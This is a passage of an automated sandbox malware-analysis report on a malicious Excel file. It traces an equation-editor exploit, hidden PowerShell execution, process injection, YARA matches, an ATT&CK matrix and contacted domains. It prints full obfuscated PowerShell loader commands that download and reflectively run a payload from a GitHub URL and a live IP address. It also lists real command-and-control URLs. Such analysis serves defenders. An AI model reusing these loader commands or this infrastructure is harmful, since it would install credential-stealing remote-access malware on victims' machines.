      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "invoke-expression( ('c'+'f1url = '+'fx'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/no'+'dete'+'c'+'ton/no'+'detecton'+'/refs/heads/main'+'/detahn'+'oth-v.'+'txtf'+'x'+'h'+'; cf'+'1'+'bas'+'e'+'64cont'+'ent'+' ='+' '+'(new-'+'object '+'syst'+'e'+'m.'+'n'+'et.webc'+'li'+'en'+'t)'+'.downloadstrin'+'g(cf1url);'+' cf'+'1bi'+'n'+'a'+'ryc'+'ontent = [sy'+'stem.c'+'on'+'v'+'e'+'rt'+']'+'::fro'+'mbase64str'+'ing(cf1base64co'+'nte'+'nt); cf1'+'a'+'ssembly = [r'+'eflecti'+'on.ass'+'embly'+']:'+':load(cf'+'1binary'+'content); '+'['+'dnlib.io.home]::vai(pnat'+'x'+'t.rerc'+'cr/333/82.14.'+'042.83//:ptthpna, pn'+'adesa'+'tivadopna, pnadesati'+'vadop'+'na,'+' pnad'+'esativadopna, pnaa'+'spnet_r'+'egbrowserspna, pnap'+'na'+',pnap'+'na)').replace('fxh',[string][char]39).replace(([char]99+[char]70+[char]49),[string][char]36).replace(([char]112+[char]78+[char]65),[string][char]34))"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'su5wt0tflwvycfjfu1njt04oicgnyycrj0yxdxjsid0gjysnzlgnkydoahr0chm6ly9yyscrj3cnkycuz2l0ahvijysndxnlcmnvbnrljysnbnquy28nkydtl05vjysnrgv0zscrj2mnkyd0t24vtm8nkydezxrly3rpbicrjy9yzwzzl2hlywrzl21haw4nkycvrgv0ywhojysnb3rolvyujysndhh0zicrj1gnkydojysnoybjricrjzenkydiyxmnkydljysnnjrdb250jysnzw50jysnid0nkycgjysnke5ldy0nkydpymply3qgjysnu3lzdccrj2unkydtlicrj04nkydldc5xzwjdjysnbgknkydlbicrj3qpjysnlkrvd25sb2fku3ryaw4nkydnkgngmxvybck7jysnigngjysnmwjpjysnbicrj2enkydyeumnkydvbnrlbnqgpsbbu3knkydzdgvtlkmnkydvbicrj3ynkydljysncnqnkyddjysnojpgcm8nkydtqmfzzty0u3ryjysnaw5nkgngmwjhc2u2nenvjysnbnrljysnbnqpoybjrjenkydhjysnc3nlbwjsesa9iftsjysnzwzszwn0ascrj29ulkfzcycrj2vtymx5jysnxtonkyc6tg9hzchjricrjzfiaw5hcnknkyddb250zw50ktsgjysnwycrj2rubglilklplkhvbwvdojpwqukoce5bdccrj3gnkyd0lljfukmnkyddui8zmzmvodiumtqujysnmdqyljgzly86chr0ahboqswgce4nkydbzgvzyscrj3rpdmfkb3boqswgce5bzgvzyxrpjysndmfkb3ankydoqswnkycgce5bzccrj2vzyxrpdmfkb3boqswgce5byscrj3nwbmv0x3inkydlz2jyb3dzzxjzce5blcbwtkfwjysntkenkycsce5bcccrj05bkscplnjlugxhq2uoj2zyaccsw1nucmlur11bq2hhcl0zoskucmvqbgfdzsgow0noyxjdotkrw0noyxjdnzarw0noyxjdndkplfttvhjpbkddw0noyxjdmzyplnjlugxhq2uokftdagfyxtexmitbq2hhcl03octbq2hhcl02nsksw1nucmlur11bq2hhcl0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "invoke-expression( ('c'+'f1url = '+'fx'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/no'+'dete'+'c'+'ton/no'+'detecton'+'/refs/heads/main'+'/detahn'+'oth-v.'+'txtf'+'x'+'h'+'; cf'+'1'+'bas'+'e'+'64cont'+'ent'+' ='+' '+'(new-'+'object '+'syst'+'e'+'m.'+'n'+'et.webc'+'li'+'en'+'t)'+'.downloadstrin'+'g(cf1url);'+' cf'+'1bi'+'n'+'a'+'ryc'+'ontent = [sy'+'stem.c'+'on'+'v'+'e'+'rt'+']'+'::fro'+'mbase64str'+'ing(cf1base64co'+'nte'+'nt); cf1'+'a'+'ssembly = [r'+'eflecti'+'on.ass'+'embly'+']:'+':load(cf'+'1binary'+'content); '+'['+'dnlib.io.home]::vai(pnat'+'x'+'t.rerc'+'cr/333/82.14.'+'042.83//:ptthpna, pn'+'adesa'+'tivadopna, pnadesati'+'vadop'+'na,'+' pnad'+'esativadopna, pnaa'+'spnet_r'+'egbrowserspna, pnap'+'na'+',pnap'+'na)').replace('fxh',[string][char]39).replace(([char]99+[char]70+[char]49),[string][char]36).replace(([char]112+[char]78+[char]65),[string][char]34))"Jump to behavior
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
      Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: GetLocaleInfoW,wcsncmp,27_2_0093770C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeQueries volume information: C:\Users\user\AppData\Roaming\niLILOT.exe VolumeInformation
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00934143 GetSystemTime,SystemTimeToFileTime,GetLastError,27_2_00934143
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0092B0AA GetUserNameExW,GetLastError,wcschr,GetComputerNameW,GetLastError,GetLastError,GetLastError,_wcsnicmp,27_2_0092B0AA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008F395D GetVersionExW,CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,27_2_008F395D
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0092CA2C LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,27_2_0092CA2C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0092C3D8 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,27_2_0092C3D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00930486 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,27_2_00930486
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0093061E RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,27_2_0093061E
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information121
      Scripting
      Valid Accounts1
      Native API
      121
      Scripting
      1
      Abuse Elevation Control Mechanism
      11
      Disable or Modify Tools
      1
      Credential API Hooking
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      2
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Shared Modules
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Deobfuscate/Decode Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop Protocol1
      Screen Capture
      21
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts43
      Exploitation for Client Execution
      1
      Scheduled Task/Job
      712
      Process Injection
      1
      Abuse Elevation Control Mechanism
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin Shares1
      Credential API Hooking
      2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts111
      Command and Scripting Interpreter
      Login Hook1
      Scheduled Task/Job
      31
      Obfuscated Files or Information
      NTDS225
      System Information Discovery
      Distributed Component Object ModelInput Capture113
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud Accounts1
      Scheduled Task/Job
      Network Logon ScriptNetwork Logon Script1
      Install Root Certificate
      LSA Secrets221
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable Media3
      PowerShell
      RC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials2
      Process Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync41
      Virtualization/Sandbox Evasion
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Rootkit
      Proc Filesystem11
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Masquerading
      /etc/passwd and /etc/shadow1
      System Owner/User Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
      Virtualization/Sandbox Evasion
      Network Sniffing1
      Remote System Discovery
      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd712
      Process Injection
      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527625 Sample: PO.78NO9.xls Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 73 m2g.me 2->73 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 20 other signatures 2->93 14 EXCEL.EXE 59 35 2->14         started        18 taskeng.exe 2->18         started        signatures3 process4 dnsIp5 83 m2g.me 14.194.50.211, 443, 49161, 49163 TTSLMEIS-AS-APTTSL-ISPDIVISIONIN India 14->83 85 38.240.41.28, 49162, 49169, 49170 COGENT-174US United States 14->85 71 C:\Users\user\Desktop\PO.78NO9.xls (copy), Composite 14->71 dropped 20 wscript.exe 1 14->20         started        23 WINWORD.EXE 348 31 14->23         started        27 niLILOT.exe 18->27         started        file6 process7 dnsIp8 97 Suspicious powershell command line found 20->97 99 Wscript starts Powershell (via cmd or directly) 20->99 101 Bypasses PowerShell execution policy 20->101 109 2 other signatures 20->109 29 powershell.exe 4 20->29         started        81 m2g.me 23->81 65 C:\Users\user\AppData\Roaming\...\m2g.me.url, MS 23->65 dropped 67 C:\Users\user\AppData\Roaming\...\a080.url, MS 23->67 dropped 69 ~WRF{71025B50-9EA6...0-2B9E7555DC6C}.tmp, Composite 23->69 dropped 103 Microsoft Office launches external ms-search protocol handler (WebDAV) 23->103 105 Office viewer loads remote template 23->105 107 Microsoft Office drops suspicious files 23->107 32 EQNEDT32.EXE 12 23->32         started        file9 signatures10 process11 file12 141 Suspicious powershell command line found 29->141 143 Obfuscated command line found 29->143 35 powershell.exe 12 5 29->35         started        59 C:\Users\...\wegivenewthingssoonsweetnes.vbS, Unicode 32->59 dropped 145 Office equation editor establishes network connection 32->145 147 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 32->147 signatures13 process14 dnsIp15 79 raw.githubusercontent.com 185.199.108.133, 443, 49171 FASTLYUS Netherlands 35->79 111 Writes to foreign memory regions 35->111 113 Injects a PE file into a foreign processes 35->113 39 aspnet_regbrowsers.exe 5 35->39         started        signatures16 process17 file18 61 C:\Users\user\AppData\Roaming\niLILOT.exe, PE32 39->61 dropped 63 C:\Users\user\AppData\Local\...\tmpB50D.tmp, XML 39->63 dropped 123 Uses schtasks.exe or at.exe to add and modify task schedules 39->123 125 Adds a directory exclusion to Windows Defender 39->125 127 Tries to detect virtualization through RDTSC time measurements 39->127 129 Injects a PE file into a foreign processes 39->129 43 aspnet_regbrowsers.exe 39->43         started        46 powershell.exe 4 39->46         started        48 schtasks.exe 39->48         started        signatures19 process20 signatures21 131 Modifies the context of a thread in another process (thread injection) 43->131 133 Maps a DLL or memory area into another process 43->133 135 Sample uses process hollowing technique 43->135 139 2 other signatures 43->139 50 explorer.exe 43->50 injected 137 Installs new ROOT certificates 46->137 process22 dnsIp23 75 www.senior-dating-73474.bond 50->75 77 www.my-tournament.live 50->77 95 System process connects to network (likely due to code injection or exploit) 50->95 54 mstsc.exe 50->54         started        signatures24 process25 signatures26 115 Modifies the context of a thread in another process (thread injection) 54->115 117 Maps a DLL or memory area into another process 54->117 119 Tries to detect virtualization through RDTSC time measurements 54->119 121 2 other signatures 54->121 57 cmd.exe 54->57         started        process27

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      PO.78NO9.xls16%VirustotalBrowse
      PO.78NO9.xls100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp100%AviraEXP/CVE-2017-11882.Gen
      C:\Users\user\AppData\Roaming\niLILOT.exe0%ReversingLabs
      No Antivirus matches
      SourceDetectionScannerLabelLink
      m2g.me0%VirustotalBrowse
      raw.githubusercontent.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      http://go.micros0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://crl.entrust.net/server1.crl00%URL Reputationsafe
      https://support.mozilla.org0%URL Reputationsafe
      https://secure.comodo.com/CPS00%URL Reputationsafe
      http://tempuri.org/kursovaSQLDataSet.xsd0%VirustotalBrowse
      https://m2g.me/a080yX0%VirustotalBrowse
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
      http://www.autoitscript.com/autoit30%VirustotalBrowse
      http://www.nasocnite.xyz0%VirustotalBrowse
      http://java.sun.com0%VirustotalBrowse
      http://38.240.41.28/333/RCCRER.txt0%VirustotalBrowse
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
      https://raw.githubusercontent.com0%VirustotalBrowse
      https://m2g.me/0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      m2g.me
      14.194.50.211
      truetrueunknown
      raw.githubusercontent.com
      185.199.108.133
      truefalseunknown
      www.senior-dating-73474.bond
      unknown
      unknowntrue
        unknown
        www.my-tournament.live
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://38.240.41.28/333/RCCRER.txttrueunknown
          http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFtrue
            unknown
            www.lefeetlab.net/gwdv/true
              unknown
              https://m2g.me/a080false
                unknown
                https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                  unknown
                  http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doctrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.lingerie-16071.bond/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      http://www.lmodt.info/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://m2g.me/a080yXFC830000.0.dr, ~DF8B1FFFD9F6395A18.TMP.0.drfalseunknown
                        http://tempuri.org/kursovaSQLDataSet.xsdpowershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                        http://www.blackwavetattoostudio.comReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          http://www.divineworks.storeexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            http://www.senior-dating-73474.bond/gwdv/www.lmodt.infoexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              http://www.3dnu3uix.collegeexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://www.blackwavetattoostudio.com/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.intelliflow.run/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.autoitscript.com/autoit3explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://crl.microsMRaspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.501592598.0000000002340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.481286410.0000000002491000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.487220752.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.lingerie-16071.bondReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.boyxlife.cyouReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.intelliflow.run/gwdv/www.3dnu3uix.collegeexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.boyxlife.cyou/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.my-tournament.liveexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.nasocnite.xyzexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                                http://www.divineworks.store/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.spanish-classes-13883.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.highercall.net/gwdv/www.incronizid.devexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.boyxlife.cyouexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.highercall.net/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.lefeetlab.netReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.lmodt.info/gwdv/www.divineworks.storeexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.divineworks.store/gwdv/www.lingerie-16071.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.lefeetlab.net/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://java.sun.comexplorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                                                  https://raw.githubusercontent.compowershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                  http://www.my-tournament.liveReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.dental-implants-84866.bond/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.accountingcourse06.shopexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://m2g.me/m2g.me.url.4.drfalseunknown
                                                                        http://www.accountingcourse06.shop/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
